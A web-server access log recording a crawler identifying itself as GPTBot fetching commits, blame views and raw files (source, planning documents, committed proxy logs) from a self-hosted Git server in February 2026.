"/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 15581] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" +[17/Feb/2026:14:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 42670] [Gzip 12.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 17895] [Gzip 10.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:14:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 22430] [Gzip 10.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:14:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15933] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:38:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13811] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" +[17/Feb/2026:14:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16940] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" +[17/Feb/2026:14:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 54917] [Gzip 18.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:14:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14469] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:14:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 24988] [Gzip 10.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 123696] [Gzip 13.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 277998] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:14:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 12777] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:14:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 20851] [Gzip 9.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20374] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" +[17/Feb/2026:14:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20372] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" +[17/Feb/2026:14:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20374] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" +[17/Feb/2026:14:38:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" +[17/Feb/2026:14:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?files=asset_pilot_docker%2fupdateRecord.md" [Client 74.7.227.38] [Length 25684] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:14:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?files=asset_pilot_docker%2fapp" [Client 74.7.227.38] [Length 32566] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" +[17/Feb/2026:14:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 30955] [Gzip 16.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:14:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 161916] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:14:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 987902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:14:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 11668] [Gzip 4.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:14:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 25961] [Gzip 14.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:14:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 117479] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:14:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 96914] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:14:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43160] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" +[17/Feb/2026:14:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43157] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" +[17/Feb/2026:14:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43160] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" +[17/Feb/2026:14:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" +[17/Feb/2026:14:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" +[17/Feb/2026:14:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" +[17/Feb/2026:14:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fapp" [Client 74.7.227.38] [Length 46093] [Gzip 8.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" +[17/Feb/2026:14:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js" +[17/Feb/2026:14:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23046] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23043] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 13018] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" +[17/Feb/2026:14:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=mail_contact.py" [Client 74.7.227.38] [Length 23739] [Gzip 5.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" +[17/Feb/2026:14:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10870] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build" +[17/Feb/2026:14:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10481] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" +[17/Feb/2026:14:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10873] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build" +[17/Feb/2026:14:38:45 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/instrument.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" +[17/Feb/2026:14:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 12932] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" +[17/Feb/2026:14:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" +[17/Feb/2026:14:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 9882] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:14:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11645] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr 